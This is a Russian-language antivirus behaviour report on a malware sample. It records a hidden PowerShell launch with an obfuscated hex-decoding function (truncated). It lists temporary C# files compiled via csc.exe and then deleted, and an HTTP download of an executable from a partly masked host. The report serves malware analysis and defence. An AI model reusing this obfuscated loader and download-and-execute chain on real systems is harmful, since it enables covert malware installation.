Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function a2591 { param($t976f) $a7fd48 = 'cef4cda';$rc962 = ''; for ($i = 0; $i -lt $t976f.length; $i+=2) { $rb65425 = [convert]::ToByte($t976f.Substring($i, 2), 16); ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ondr2zqn.0.cs
- %TEMP%\ondr2zqn.cmdline
- %TEMP%\ondr2zqn.out
- %TEMP%\csc51b1.tmp
- %TEMP%\res51c1.tmp
- %TEMP%\ondr2zqn.dll
Удаляет следующие файлы
- %TEMP%\res51c1.tmp
- %TEMP%\csc51b1.tmp
- %TEMP%\ondr2zqn.pdb
- %TEMP%\ondr2zqn.cmdline
- %TEMP%\ondr2zqn.dll
- %TEMP%\ondr2zqn.out
- %TEMP%\ondr2zqn.0.cs
Сетевая активность
TCP
Запросы HTTP GET
- http://pe####uan.lan.go.id/www/04.exe
UDP
- DNS ASK pe####uan.lan.go.id
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ondr2zqn.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES51C1.tmp" "%TEMP%\CSC51B1.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ondr2zqn.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES51C1.tmp" "%TEMP%\CSC51B1.tmp"
